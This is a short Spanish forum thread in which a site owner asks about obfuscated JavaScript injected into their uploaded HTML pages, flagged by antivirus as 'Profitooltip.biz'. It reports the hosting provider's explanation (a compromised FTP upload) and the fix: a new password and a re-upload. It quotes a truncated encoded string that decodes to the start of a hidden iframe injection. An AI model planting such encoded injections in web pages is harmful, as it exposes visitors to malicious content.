Profitooltip, ¿es un virus?
Hola a todos,
gracias por dedicarme unos minutos a escuchar mi problema.
Al subir un .html a mi web, se añade un javascript del estilo:
var eEEhjZPxBDEkiueTxUaH = "wMiJw60wMiJw105wMiJw102wMiJw114wMiJw97wMiJw109wMiJw101wMiJw32wMiJw119wMiJw105wMiJw100wMiJw116wMiJw104wMiJw61wMiJw34wMiJw52wMiJw56wMiJw48wMiJw34wMi ... etc etc
Me he dado cuenta de esto, pq al mirar la página desde cualquier navegador, mi antivirus me detecta un supuesto malicioso llamado: "Profitooltip.biz"
Al recibir este aviso y al darme cuenta q mi web tiene un scroll horizontal q cuando la maqueté no lo tenía, he ido al "Ver código fuente". Y ha sido entonces cuando he visto el código javascript del cual os hablaba al inicio del mensaje.
¿Le pasa a alguien +? ¿De qué se trata? ¿Cómo hago para q no se añada ese código al subir mis .html? ¿Cómo mato al supuesto virus?
Gracias!!!!
PD: si encuentro respuestas, las postearé aquí!
elperroverde
Uff, últimamente hay virus por todas partes... yo por si acaso me he puesto la mascarilla.
transparentpixel
Ya tengo respuesta de Cdmon!! Son increiblemente rápidos! Y tienen servicio técnico incluso festivos!! Muy aconsejable alojarse en Cdmon!
Me comentan q posiblemente se ha debido al realizar el FTP desde un programa no seguro, y q seguramente han detectado un agujero y me han inyectado el javascript.
Concretamente lo hice desde Dreamweaver. Me comentan q desde Filezilla no debería tener problemas, q cambiara la contraseña de mi FTP, y volviera a subir el .html desde Filezilla. Efectivamente! Así lo he hecho y ha desaparecido el problema!!
Espero q os sea de ayuda, si os surge el problema